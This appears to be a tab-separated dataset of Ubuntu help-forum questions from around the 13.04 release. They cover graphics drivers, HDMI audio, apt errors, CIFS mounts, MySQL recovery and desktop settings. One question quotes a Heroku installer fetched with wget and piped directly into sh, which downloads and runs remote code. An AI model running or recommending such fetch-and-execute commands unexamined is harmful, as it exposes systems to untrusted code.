285846	how to modify notify-osd in ubuntu 13.04 ?	the leolik ppa , which worked in both 12.04 and 12.10 no longer works in 13.04 , nor do commands like : gsettings set com.canonical.notify-osd gravity 3 so the old ways i used to modify the notification locations and behavior no longer work . how do i modify notify-osd behavior in ubuntu 13.04 ?
285848	should i manually fix the distribution entry after os upgrade ?	i have upgraded to 13.04 with do-release-upgrade . during the upgrade , most of the repository sources will be disabled . now that the upgrade is finished , and while looking which of them i want enabled , i noticed that some of them still have an older distribution in their entry . and some of them have raring . i am wondering if i should manually change them to raring not bother and enable them as is not enable them at all which is safer and/or better action to do in this case ? example of a source auto-updated to raring : example of a source still using precise :
285849	how to uninstall heroku ?	i installed heroku using wget -qo- https : //toolbelt.heroku.com/install-ubuntu.sh | sh please tell me how to uninstall heroku ?
285855	/lib/x86_64-linux-gnu/libz.so.1 : could not read symbols : invalid operation	i installed ubuntu desktop 13.10 64-bit in vmware . i am trying to compile php 5.4.14 on the machine . here 's the bit where make stops due to an error : /usr/bin/ld : ext/mysqlnd/.libs/mysqlnd_net.o : undefined reference to symbol 'uncompress' /usr/bin/ld : note : 'uncompress ' is defined in dso /lib/x86_64-linux-gnu/libz.so.1 so try adding it to the linker command line /lib/x86_64-linux-gnu/libz.so.1 : could not read symbols : invalid operation collect2 : error : ld returned 1 exit status make : *** [ sapi/cli/php ] error 1 i have the same version of php compiled and built on a 12.10 32-bit vm and it seems to be working properly . i have checked that i have zlib1g zlib1g-dev and zlibc installed . what could be the problem ?
285862	qt5 font rendering in ubuntu 13.04	my fonts in general within qtcreator inside ubuntu 13.04 looks 'ugly ' when compared to how they looked in 12.10 . 12.10 still used qt4 , so did something regarding the font rendering in qt5 and the most up to date qtcreator change then ? if so , is there a workaround and or fix for this please ? seeing that this affects the ubuntu-sdk ( which of course is using qtcreator ) one would assume that a fix must be available ; )
285865	ubuntu 13.04 freeze and kernel panics	i really like the speed increases in ubuntu 13.04 and the over enhancements to the unity interface . however i am experiencing frequent lock-ups and kernel panics . this did not happen in 12.04 or 12.10 . is there a way for me to see in some log files what is causing this please ? i would really like to contribute in any way i can to assist with getting these freeze ups resolved . it is an amazing os with a lot of potential .
285868	ubuntu 13.04 shutdown hangs in asus p42f	on shutdown the following message is displayed : acpid : exiting speech-dispatcher disabled ; edit /etc/default/speech-dispatcher the computer hangs at this spot and does not complete a shutdown or reboot as requested . manually powering the machine down does work , but i can not seem to find the culprit responsible for the system hang . i have no proprietary drivers and no updates are listed as available . does anyone have an idea of what might be causing this issue ? i noticed a similar question here : ubuntu 13.04 shutdown hangs in asus a3500e
285869	friends app missing on ubuntu 13.04	i recently installed 13.04 and successfully updated the whole os . there was this friends app that came with ubuntu to replace gwibber , but now its gone and ca n't find it anywhere .
285870	no audio through hdmi - nvidia gfx	i have read a lot of posts about this , mainly it is people with ati cards or people that havnt got the option to choose hdmi audio . but it just ai n't my problem , afaik . i have installed my graphics card , and hooked up my old labtop to the tv as a media center , videofeed is going through nicely . but the sound is lacking , even though the hdmi output is selected , then it stills outputs the sound through the labtop . i have got a nvidia 9500m ( as far as i remember ) updated the drivers like this at the bottom you will see an image with my option to select hdmi , but no mode or a like is available but the option is there . hopes someone can help me . thanks edit 1 : okay so have tried what was written , running alsamixer ( really not sure what i can do within it though there is nothing directly mentioned as hdmi , could not turn up volume for s/pdif it was locked on 00 , screenshot at the bottom . ) also i installed pavucontrol , and tried it , did nothing . what i find really weird is that when i switch from speakers to hdmi nothing happens , i still hear sound through the speakers , but if i change to s/pdif then sound stops , also if switched to hdmi again . until it has been switched back to speakers . image 1 ( option to choose hdmi ) : image 2 ( alsamixer ) :
285871	sudo apt-get failure	i was trying to sudo apt-get update and it spits out this errors : w : conflicting distribution : http : //us.archive.ubuntu.com precise-updates release ( expected precise-updates but got precise ) w : failed to fetch bzip2 : /var/lib/apt/lists/partial/us.archive.ubuntu.com_ubuntu_dists_precise-updates_main_source_sources hash sum mismatch w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/restricted/source/sources 404 not found [ ip : 91.189.91.15 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/universe/source/sources 404 not found [ ip : 91.189.91.15 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/multiverse/source/sources 404 not found [ ip : 91.189.91.15 80 ] w : failed to fetch bzip2 : /var/lib/apt/lists/partial/us.archive.ubuntu.com_ubuntu_dists_precise-updates_main_binary-i386_packages hash sum mismatch w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/restricted/binary-i386/packages 404 not found [ ip : 91.189.91.15 80 ] w : failed to fetch bzip2 : /var/lib/apt/lists/partial/us.archive.ubuntu.com_ubuntu_dists_precise-updates_universe_binary-i386_packages hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/us.archive.ubuntu.com_ubuntu_dists_precise-updates_multiverse_binary-i386_packages hash sum mismatch e : some index files failed to download . they have been ignored , or old ones used instead . any idea how to fix this ?
285874	how can i mount cifs shares in ( k ) ubuntu 13.04 ?	in ( k ) ubuntu 12.10 , i could mount a cifs drive ( from my apple airport extreme ) with sudo mount -t cifs -o user=foobar , password=foobar , rw , hard , nosetuids , noperm //192.168.1.2/drive ~/mnt/mount_point this no longer works after my upgrade to 13.04 today . i now get the error mount error ( 22 ) : invalid argument refer to the mount.cifs ( 8 ) manual page ( e.g . man mount.cifs ) i already had cifs-utils installed , and installing smbnetfs did not help . how can i mount cifs volumes in ( k ) ubuntu 13.04 ?
285883	dell insprion n5520 drivers	please can some one help me and tell me where can i get dell insprion n5520 drivers for ubuntu 13.04 i vist dell website but all drivers for windows i want drivers for ubuntu , thanks
285884	how to change desktop workspace ?	in version 12.10 we could change spaces with ctrl + right/left/up/down . but now ? are there spaces here ? no information keeping pressed the super key .
285885	primus failed to load libraries in raring	bumblebee is working fine . but primus is giving me an issue . vblank_mode=0 primusrun glxspheres primus : fatal : failed to load any of the libraries : /usr/lib/nvidia-304/libgl.so.1 : /usr/lib32/nvidia-304/libgl.so.1 libnvidia-tls.so.304.88 : can not open shared object file : no such file or directory /usr/lib32/nvidia-304/libgl.so.1 : wrong elf class : elfclass32 i 've changed the bridge mode in bumblebee.conf to primus to no avail ls -la /usr/lib/nvidia* /usr/lib/nvidia : total 32 drwxr-xr-x 2 root root 4096 apr 24 10:03 . drwxr-xr-x 176 root root 24576 apr 26 03:50 .. -rwxr-xr-x 1 root root 120 jun 29 2012 pre-install /usr/lib/nvidia-304 : total 84392 drwxr-xr-x 6 root root 4096 apr 25 16:33 . drwxr-xr-x 176 root root 24576 apr 26 03:50 .. -rw-r -- r -- 1 root root 0 apr 10 09:21 alt_ld.so.conf drwxr-xr-x 2 root root 4096 apr 25 16:32 bin -rw-r -- r -- 1 root root 42 apr 10 09:22 ld.so.conf lrwxrwxrwx 1 root root 17 apr 10 09:21 libcuda.so - > libcuda.so.304.88 lrwxrwxrwx 1 root root 17 apr 10 09:21 libcuda.so.1 - > libcuda.so.304.88 -rw-r -- r -- 1 root root 10219344 apr 10 09:22 libcuda.so.304.88 lrwxrwxrwx 1 root root 10 apr 10 09:21 libgl.so - > libgl.so.1 lrwxrwxrwx 1 root root 15 apr 10 09:21 libgl.so.1 - > libgl.so.304.88 -rw-r -- r -- 1 root root 1076560 apr 10 09:22 libgl.so.304.88 lrwxrwxrwx 1 root root 15 apr 10 09:21 libnvcuvid.so - > libnvcuvid.so.1 lrwxrwxrwx 1 root root 20 apr 10 09:21 libnvcuvid.so.1 - > libnvcuvid.so.304.88 -rw-r -- r -- 1 root root 2196224 apr 10 09:22 libnvcuvid.so.304.88 lrwxrwxrwx 1 root root 18 apr 10 09:21 libnvidia-cfg.so - > libnvidia-cfg.so.1 lrwxrwxrwx 1 root root 23 apr 10 09:21 libnvidia-cfg.so.1 - > libnvidia-cfg.so.304.88 -rw-r -- r -- 1 root root 144864 apr 10 09:22 libnvidia-cfg.so.304.88 lrwxrwxrwx 1 root root 23 apr 10 09:21 libnvidia-compiler.so - > libnvidia-compiler.so.1 lrwxrwxrwx 1 root root 28 apr 10 09:21 libnvidia-compiler.so.1 - > libnvidia-compiler.so.304.88 -rw-r -- r -- 1 root root 27730224 apr 10 09:22 libnvidia-compiler.so.304.88 -rw-r -- r -- 1 root root 35454032 apr 10 09:22 libnvidia-glcore.so.304.88 lrwxrwxrwx 1 root root 17 apr 10 09:21 libnvidia-ml.so - > libnvidia-ml.so.1 lrwxrwxrwx 1 root root 22 apr 10 09:21 libnvidia-ml.so.1 - > libnvidia-ml.so.304.88 -rw-r -- r -- 1 root root 394280 apr 10 09:22 libnvidia-ml.so.304.88 lrwxrwxrwx 1 root root 26 apr 25 16:33 libnvidia-opencl.so.1 - > libnvidia-opencl.so.304.88 -rw-r -- r -- 1 root root 8628320 apr 10 09:22 libnvidia-opencl.so.304.88 -rw-r -- r -- 1 root root 11704 apr 10 09:22 libnvidia-tls.so.304.88 lrwxrwxrwx 1 root root 23 apr 25 16:33 libnvidia-wfb.so.1 - > libnvidia-wfb.so.304.88 -rw-r -- r -- 1 root root 295272 apr 10 09:22 libnvidia-wfb.so.304.88 lrwxrwxrwx 1 root root 14 apr 10 09:21 libopencl.so - > libopencl.so.1 lrwxrwxrwx 1 root root 16 apr 10 09:21 libopencl.so.1 - > libopencl.so.1.0 lrwxrwxrwx 1 root root 18 apr 10 09:21 libopencl.so.1.0 - > libopencl.so.1.0.0 -rw-r -- r -- 1 root root 21296 apr 10 09:22 libopencl.so.1.0.0 lrwxrwxrwx 1 root root 23 apr 10 09:21 libxvmcnvidia_dynamic.so.1 - > libxvmcnvidia.so.304.88 lrwxrwxrwx 1 root root 23 apr 10 09:21 libxvmcnvidia.so - > libxvmcnvidia.so.304.88 lrwxrwxrwx 1 root root 23 apr 10 09:21 libxvmcnvidia.so.1 - > libxvmcnvidia.so.304.88 -rw-r -- r -- 1 root root 167000 apr 10 09:22 libxvmcnvidia.so.304.88 drwxr-xr-x 2 root root 4096 apr 25 16:32 tls drwxr-xr-x 2 root root 4096 apr 25 16:32 vdpau drwxr-xr-x 2 root root 4096 apr 25 16:32 xorg -rw-r -- r -- 1 root root 27 apr 10 09:22 xvmcconfig /usr/lib/nvidia-settings-304 : total 72 drwxr-xr-x 6 root root 4096 apr 25 16:32 . drwxr-xr-x 176 root root 24576 apr 26 03:50 .. drwxr-xr-x 2 root root 4096 apr 25 16:32 bin drwxr-xr-x 3 root root 4096 apr 25 16:32 include -rw-r -- r -- 1 root root 29 apr 10 09:20 ld.so.conf -rw-r -- r -- 1 root root 23062 apr 10 09:20 libxnvctrl.a drwxr-xr-x 3 root root 4096 apr 25 16:32 share drwxr-xr-x 4 root root 4096 apr 25 16:32 usr
285887	after do-release-upgrade to 13.04 from 12.10 i still get informed about 13.04 on log-in via motd	this was an issue with moving to 12.10 it appears to have resurfaced now with 13.04 i.e . post upgrade to 13.04 you still get the motd to upgrade . i 've tried the previous list of fixes for the same issue re move to 12.10 upgrade 12.04.2 lts to 12.10 do-release-upgrade fails - no new release found but they do n't seem to work , i.e . there is no /var/lib/update-notifier/release-upgrade-available to remove .
285893	how to make gmail standard work in icecat ( v.17 ) - javascript problem	i want to try icecat browser ( i like having different yet similar browsers , so i want this beside firefox ) . to install sudo add-apt-repository ppa : gnuzilla-team/ppa & & sudo apt-get update & & sudo apt-get install icecat -y but then : but java is enabled the list of plugins is the same in icecat and firefox , where gmail works fine . what could be the matter ?
285899	eclipse 4.2 ( juno ) crashes on ubuntu 12.04 ( precise )	i installed eclipse 4.2 java on ubuntu 12.04 x86_64 and it just crashes everytime it opens the auto completion context menu . it crashes without any error message and just closes the eclipse window . interestingly , it also crashes when i click on of the menu points in edit- > content assist and it crashes when i click in the window- > preferences on the menu point general- > web browser . ( i experienced that because i wanted to switch off auto completion , but i could n't find it . ) does anybody have a clue what 's wrong ? i can provide any information you need , just let me know . i can also perform steps that might seem promising to you and report the results . some information that might be interesting to you : i have tried with different versions of java jdk , e.g . openjdk-6-jdk , openjdk-7-jdk , oracle-6-jdk , oracle-7-jdk , and different versions of eclipse , e.g . eclipse 3.7 ( indigo ) and eclipse 4.2 ( juno ) . nothing worked out , but maybe i did it wrong because i had to install oracle-jdk 's manually . $ java -version java version `` 1.7.0_15 '' openjdk runtime environment ( icedtea7 2.3.7 ) ( 7u15-2.3.7-0ubuntu1~12.04.1 ) openjdk 64-bit server vm ( build 23.7-b01 , mixed mode ) $ javac -version javac 1.7.0_15
285905	unity menu bar volume control gone in 13.04	it was there in 12.10 , but now it 's gone . how do i get it back , please ?
285909	ubuntu 13.04 randomly freezes	i just upgraded my ubuntu from 12.10 to 13.04 . i use dell studio 1558 laptop . after upgrade my system keeps freezing randomly . one it freezes after 3 minutes , once after 1 minute and so on ... when it freezes i see all on my screen , but frozen . there is no errors , nothing.on 12.10 system works fine , even more than week . now it stops and i see screenshot like on my desktop . any ideas what to do ? if only i could give any logs , but i get nothing . on gnome i get freeze with error like on the screen attached . i have n't found any solution for that . reisub method does n't work here . edit : the problem was kernel delivered with 13.04 . i 've installed 3.9 ( rc8 ) and problem is gone : ) but now , there is 3.9 release ( link ) hope that helped you .
285914	ubuntu 12.04 to 13.04	i have ubuntu 12.04 and i have just heard about the new release of ubuntu 13.04 . i want to upgrade but the update manager has not said anything about a new version of ubuntu . i do n't know how to upgrade if my update manager does n't say there 's a new version .
285920	no sound through hdmi out , 13.04	i just installed ubuntu 13.04 on my media pc , and i successfully installed catalyst 13.4 and everything works great except i get no sound out of hdmi out . in the sound dash there are 3 options but none make any difference : there is digital output ( s/pdif ) , headphones , and analogue output . any help is appreciated . thank you in advance .
285927	is it possible to change kde dolphin 's drag-and-drop behaviour to move ?	when you drag a file somewhere in kde , it pops up a little context menu , asking what you want to do with it . this is similar to gnome 's dnd behaviour if you hold alt . it 's not for me . i 'd rather things worked like gnome and windows : move by default unless it 's on a different filesystem , then copy ... with the standard modifier keys to force move/copy/menu . i suspect this might be possible with a hidden array of settings that i have n't found yet . could somebody poke me in the right direction ?
285931	`` appearance '' icon has vanished from `` system settings ''	i have been using gnome-shell for a few months . i was able to configure it using `` tweak tool '' and `` background '' . now i 've just migrated to unity , but `` change desktop background '' ( comes from right-click on desktop ) launches `` system settings '' . i 'm not able to swap desktop wallpaper or change launcher icons ' size , etc . as you can see from this picture , the `` appearance '' icon has been removed from `` system settings '' . what 's happened to my ubuntu ? my os : ubuntu 12.10 ; unity + gnome-shell ; latest updates
285935	why is pcmanfm is still running after following the lxde/xfce hybrid instructions ?	os : lubuntu 13.04 i 'm trying to replace pcmanfm with thunar and xfdesktop . for this , i followed the procedure described in the section titled `` lxde/xfce hybrid '' here . however , after a reboot , the desktop is still controlled by pcmanfm and when i run ps -ef i see this ( in part ) : uid pid ppid c stime tty time cmd vasa1 1624 1540 0 18:18 ? 00:00:00 pcmanfm -- desktop -- profile lubuntu vasa1 1642 1 0 18:18 ? 00:00:00 xfdesktop if i kill the process , xfdesktop immediately takes over . so why is pcmanfm still running ? is this : stop pcmanfm desktop being run on login : edit the file /etc/xdg/lxsession/lubuntu/autostart and change the line @ pcmanfm -- desktop -- profile lubuntu to ! @ pcmanfm -- desktop -- profile lubuntu no longer effective ?
285936	is there a different file-manager available for 13.04 ?	i do n't really need to make a list of whats wrong with 3.6 , cause my guess is , we probably have a identical list . question : is there a different file-manager that also writes the desktop , and has similar features like f3 etc ... etc.. ( can i also downgrade from 3.6 to an older nautilus )
285938	how can i change launcher scrolling behavior back ?	i 've just upgraded to 13.04 . now mouse scrolling on launcher results not in moving through launcher , but in application switching . is there a way to change this behavior back , so i 'll be able to scroll up/down through launcher icons ?
285940	how to resize the system settings window ?	how do i resize or scroll down system settings windows , please check the pic below there is no option to scroll or resize , if more than 1 application indicator added in system settings then i cant see any thing in last is there any way i can resize or how i fix it ? ? update i have also tried similar post but none work , but now i can see all all icons . how can i resize the system settings window ? by adding a line < property name= '' width_request '' > 1000 < /property > but still not resize-able update now to maximize sound volume , i have to enable workspace then change sound settings same with display settings
285943	what is gallium ? `` gallium 0.4 on amd ''	i have laptop using ati mobility radeon hd 4640 video controller . i know there is an issue with official amd drivers in 12.10 and 12.04 and problems with legacy drivers , but i tried to see if these are fixed in 13.04 so i installed fresh copy of 13.04 and found under system : gallium 0.4 on amd rv730 first time i 've seen this ... lshw -c display gives this information : description : vga compatible controller product : m96 [ mobility radeon hd 4650 ] vendor : advanced micro devices [ amd ] nee ati physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=radeon latency=0 resources : irq:49 memory : d0000000-dfffffff ioport:2000 ( size=256 ) memory : cfef0000-cfefffff memory : cfe00000-cfe1ffff what is it ? is my driver working normally or is it some kind of bug ? what is gallium ?
285944	how install nvidia drivers in ubuntu 13.04 ?	today i performed fresh install of ubuntu 13.04 . after this i tried to install nvidia graphics driver . i used 2 methods : how do i install extra drivers ? http : //falkvinge.net/2013/02/15/how-to-install-nvidia-drivers-in-ubuntu-12-10-quantal/ both of them with the same result . black screen with some text on it . i saw that many ubuntu users have the same issue . nvidia drives just broke the system . not sure if i can say that ubuntu is so user friendly system if you just press install in addidtional drivers tab and you can say goodbye to your os . how this can be fixed ? does anybody know some other ways ? thanks in advance .
285950	ubuntu 13.04 no internet no adapters	i have no internet after 13.04 install . it worked fine with 12.04 . does not appear to have either wired or wireless adapters installed . wireless adapter is broadcom bcm4311 802.11 b/g . its a dell inspiron 1501 . ifconfig : user @ test : ~ $ ifconfig -a lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:13744 errors:0 dropped:0 overruns:0 frame:0 tx packets:13744 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1116384 ( 1.1 mb ) tx bytes:1116384 ( 1.1 mb )
285951	how to add programs to the launcher ( search ) ?	i installed eclipse juno to /usr/local/eclipse and added it to the $ path . so i can run it from terminal simply by entering `` eclipse '' . now i want a launcher icon for it and it would be nice to have it in the applications when you search for it . this seems to complicated considering the tutorials i found . when i launch eclipse i can lock it to the launcher , but it will not start from there when i click the icon . how do i get it to the launcher and to the search ?
285953	why ubuntu 12.10 returns a `` network is unreachable '' no matter what ip i ping after i edited the hosts file ?	the problem is related to the network config settings in ubuntu . i edit my hosts file , and now i ca n't load any sites except those ip ( ipv6 ) included in hosts file . i try to ping some ip ( both ipv4 and ipv6 ) in the terminal , but it shows that `` network is unreachable '' . or can somebody simply tell how to restore hosts file in ubuntu . p.s i do n't have a backup .
285959	booting from live usb of ubuntu 12.10 stops at black screen	using liveusb i created a bootable usb with ubuntu 12.10 desktop . when i boot from the usb it always stops at a black screen . how can i tell what 's going on and how to fix it ?
285960	when will 13.04 make it to `` released '' status in maas ?	i wanted to see if anyone knew when raring will make it to http : //maas.ubuntu.com/images/ephemeral/releases/ to be downloaded and deployed by maas ? i know the daily builds are available there , but have some issues deploying from daily builds as it is . thanks !
285963	browser does not load all graphics on websites , especially on facebook	unfortunatly my browser ( google chrome ) does not load all images . everytime i visit facebook the browser does not load all images . i had that problem already on ubuntu 12.04 , but 13.04 has got the same problem ? ps : firefox has got the same problem . any solution ?
285970	mouse acceleration 13.04	a new release of ubuntu brought a new mouse settings window . however , it only lists a sensitivity setting , no acceleration . where is the setting for acceleration ? how do i disable it ? if i disable acceleration using xinput ( e.g . xinput -- set-prop 15 270 1 , which sets the acceleration multiplier to 1 ) it returns if i disconnect and reconnect my mouse , and also if i reboot . any way around this ?
285973	mac icons on ubuntu 13.04 !	i have already asked question like that . it was marked for duplicate . i want to not i am not asking for 12.10 or 12.04 ! ! i am asking for 13.04 ! i use gnome cupertino theme etc . but not everywhere nautilus looks as it should be , by that i mean not mac buttons show up , but regular gnome buttons do . is there any way to repair it ? i `` installed '' gnome cupertino through ubuntu tweak . thanks for help .
285974	how do i get an updated 13.04 to use graphics drivers the same way as live usb ?	so within 3-4 days i updated from ubuntu 12.04 through 12.10 to 13.04 ( on non-dev release ) . i have an onboard ati x1250 which works fine with standard/open source drivers , but i really want to use my ( now unplugged ) hd6750 . before updating i tested both on 13.04 live usb and they worked flawlessly , but now in my updated system , the hd6xxx gives me the purple screen on startup two times , but only orange vertical lines once i reach login . even ctrl-alt-f2 gives me a black screen . what could need resetting/reconfiguring to get rid of any hidden settings left from the updating to have a startup akin to live usb ? any other pointers ? might i have to do a clean install ? thanks for the help . p.s . i have now tried reinstall ( not fresh install ) from live usb , but to no avail .
285976	download zip file with curl command	how can i download zip file with curl command ? i tried curl -so , but error occurred . i want to download zip file from address : http : //github.com/ziyaddin/xampp/archive/master.zip but ca n't . what must i type ?
285977	why is hdmi taking so long ?	i have ubuntu 13.04 with some integrated intel graphics chip , and a monitor with dvi and hdmi . when i use the dvi output , everything is ok , but if use hdmi it takes ages to recognise it , and i have to wait half a minute until i can see my login screen . in case it helps : it also has that problem when i log out , and when i wake it up from sleep or locked . i had the same problem with 12.10 .
285980	ho do i update to 13.04 from the beta ?	i usually use : sudo apt-get update ; sudo apt-get upgrade ; sudo apt-get dist-upgrade ; sudo apt-get autoremove to update my system which is the 13.04 beta , is there anything special i need to do to get onto the latest version or are the commands i 'm using enough for that ?
285985	ubuntu tweak crashes on launch ubuntu 13.04	when i start ubuntu tweak from dash , system settings or terminal , it immediatly crashes . i get this error code from the terminal : traceback ( most recent call last ) : file `` /usr/bin/ubuntu-tweak '' , line 124 , in < module > from ubuntutweak.main import ubuntutweakwindow file `` /usr/lib/python2.7/dist-packages/ubuntutweak/main.py '' , line 33 , in < module > from ubuntutweak.apps import appspage file `` /usr/lib/python2.7/dist-packages/ubuntutweak/apps/__init__.py '' , line 19 , in < module > from ubuntutweak.policykit.dbusproxy import proxy file `` /usr/lib/python2.7/dist-packages/ubuntutweak/policykit/dbusproxy.py '' , line 22 , in < module > from in import int_max importerror : can not import name int_max any way to fix it , seems like an easy import fix ?
285989	ubuntu raring 13.04 x64 amd radeon hd 7500m/7600m fglrx issue	i finished install my fresh ubuntu 13.04 x64 and would like install fglrx ( ati driver ) . but , i tried install the new amd proprietary 13.4 and got a low graphics mode after reboot . when i install both fglrx or fglrx-updates the system do n't boot . when i was using the precise version i installed with success through repository ppa : andrikos/ppa in x86 version . can someone help me out ? here is my lspci output : christopher @ inspiron : ~ $ lspci 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port ( rev 09 ) **00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) ** 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.3 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 4 ( rev c4 ) 00:1c.5 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 6 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm77 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) **02:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati thames [ radeon 7550m/7570m/7650m ] ** 07:00.0 network controller : atheros communications inc. ar9485 wireless network adapter ( rev 01 ) 09:00.0 ethernet controller : qualcomm atheros ar8162 fast ethernet ( rev 10 )
285991	ubuntu 13.04 background is white when handled by file manager , and has no background when it is not	long story short , i installed ubuntu 13.04 , and added the gnome ppa but after installation i realized that the background was now white/grey . i tried ppa purging the gnome ppa but it failed . upon right clicking the desktop i realized it was the standard nautilus right click menu so i disabled the file manager from handling the desktop and now my background is nothing . it takes whatever was open last before it was closed and displays that and it disables my minimize function so currently the file manager is handling my desktop so it can function properly . basically my question is how do i set my computer back to its original configuration without reinstalling ubuntu again , or more simply , how can i get my background back . thanks a lot .
285995	run wallch in background	new to the ubuntu scene . is it possible to get wallch to run in the background ? because when i 'm running wallch right now i have to start it up then bar it and leave it running for the time i 'm on the computer . is there a way to `` hide '' it ?
286005	skype crashes after installing ubuntu 13.04	after upgrading from ubuntu 12.10 to 13.04 i have installed skype . but it crashes time to time . what can i do to solve this problem ?
286007	how open *.sh *.py files in terminal ubuntu 13.04 ?	in ubuntu 12.10 , after doing the chmod a+x ./*.sh command there was two options showing when double on *.sh file ( open in terminal - display ) but in ubuntu 13.04 even after doing chmod a+x command , it still open in the text editor is there any solution ?
286008	fn + button shortcuts stopped working when updated to ubuntu 13.04	i 'm running ubuntu on asus ks53k , and after updating to ubuntu 13.04 fn + keys from f9 to f12 and fn + numpad enter give no response . these worked properly on 12.10 . has anyone else experienced the same ? any ideas how to fix this ?
286014	bring in old databases in mysql ?	ok , so when mysql updated a while back , it broke . it was simply not starting . so i tried fixing it , but had n't been successful . i finally gave up , copied all the directories & files under /var/lib/mysql out to a safe location , apt-get purge mysql , then apt-get install mysql . so the server is running , but i can not , for the life of me , seem to get the old databases back in , and in a useable form . i did get my gallery3 database in by just copying the gallery3 dir from my mysql/backup location in . but my actually gallery3 installation would n't talk to it . : / possibly there are permission issues , but i 'm really clueless about sql . any help would be appreciated .
286015	the new ubuntu upgrade ( 13.04 ) wont let me connect to wi-fi	ever since i upgraded ubuntu to 13.04 i have n't been able to connect to any wi-fi . i could connect to wi-fi with every version of ubuntu till this one . when i click on network manager the `` enable wireless '' appears faded , i cant click on it . i suspect it could be driver issues ... my network card is : ar9485 wireless network adapter anyone have any clues on how to fix ? ps : i 've been seeing a lot of wireless network issues ever since the new version came out .
286017	how can i remove `` install this '' from my ubuntu usb installation ?	can i run ubuntu 12.04 lts off my 4gb usb drive as its own native operating system with persistence enabled to save changes to the usb the same way that i do with slax or other fully portable linux distros ? how can i remove the `` install this '' icon in my current live ubuntu usb installation ? can i run it fully portably without the icon wanting me to install it to the host computer ? i 'm a windows xp user , but i would like to switch to ubuntu on an 8gb usb if it 's possible .
286018	ubuntu 12.10 wo n't boot after security updates	ubuntu 12.10 64bit on a dell studio 1558 laptop ( i7 with 4 g of ram ) . everything worked fine ... last week i installed security updates and for some reason it just wo n't boot after the updates formated my system 3 times and it kept happening . does anyone know wich are the updates that makes ubuntu-studio to not boot after install ?
286020	how to setup awesome wm with gnome services on arbitrary ubuntu ?	tl ; dr is there a generic guide to set up gnome background services to work with awesome wm on any ubuntu ? the official guide does n't seem to have been updated since ubuntu 11.10 . another guide is slightly more up to date , but after upgrading to 12.10 : gnome panels on the top and bottom of the first monitor . they should n't be there . awesome wm background image . awesome panels on the second monitor . awesome controls work ( mod4+number to go to tag , etc. ) . after upgrading to 13.04 today it 's even worse : gnome panels on the top and bottom of the first monitor . still should n't be there . no panels on the second monitor . awesome wm background image . feh error message when logging in even though it is installed . sorry , ca n't copy it here since i ca n't reproduce ( see below ) . windows are placed at x=0 and y=something like -10 ( the window title bars are about 90 % offscreen ) . this means i ca n't access the menu in the top panel without closing all open applications ( since they ca n't be moved by dragging with either mod4 or meta held down ) . some gnome keyboard shortcuts work ( ctrl+meta+del , ctrl+meta+t ) , but not others ( meta+f1 ) . no awesome keyboard or mouse controls work ( mod4+number , mod4+enter , mod4+mouse drag ) . points 3 and 4 only happened the first time after rebooting into 13.04 ; on the second login i get the ubuntu background image and no feh error message . the command i cobbled together to setup `` awesome gnome '' based on the guide ( reformatted for readability ) : sudo sh -c ' apt-get install awesome awesome-extra gnome-session-fallback notification-daemon & & \ printf `` % s\n '' `` [ desktop entry ] '' `` version=1.0 '' `` type=application '' `` name=awesome '' `` tryexec=awesome '' `` exec=awesome '' | tee /usr/share/applications/awesome.desktop & & \ printf `` % s\n '' `` [ desktop entry ] '' `` name=gnome with awesome '' `` comment=gnome with awesome as window manager '' `` tryexec=gnome-session '' `` exec=gnome-session -- session=awesome '' `` type=application '' | tee /usr/share/xsessions/gnome-awesome.desktop & & \ printf `` % s\n '' `` [ gnome session ] '' `` name=awesome '' `` requiredcomponents=gnome-panel ; gnome-settings-daemon ; '' `` requiredproviders=windowmanager ; notifications ; '' `` defaultprovider-windowmanager=awesome '' `` defaultprovider-notifications=notification-daemon '' | tee /usr/share/gnome-session/sessions/awesome.session' @ rolandsommer 's answer fixed most of the issues . in the meantime i worked around a crash by commenting out all awful.util.spawn entries .
286021	can not add languages to spellcheck in texworks	i use texworks to edit my latex files . under spellcheck , the only options that i have are uk english and south african english , and i would like to install more languages . in /usr/share/myspell/dicts many languaes are already present , but only the only aff files present are en_gb.aff en-gb.aff and en_za.aff i can not simply grab the aff files that i would like and put them there , because the directory is protected as `` root '' editable only . the permission of dicts is ownede by root and set to rwxr-xr-x . i am quite sure that this is the correct directory . /usr/marc/.texworks/dictionaries does not even exist . /usr/share/hunspell also has australian and us english in it and they do not show up in my texworks dropdown menu . how can i get past this root protection ? is there an install command that would allow me tograb these aff files somewhere ?
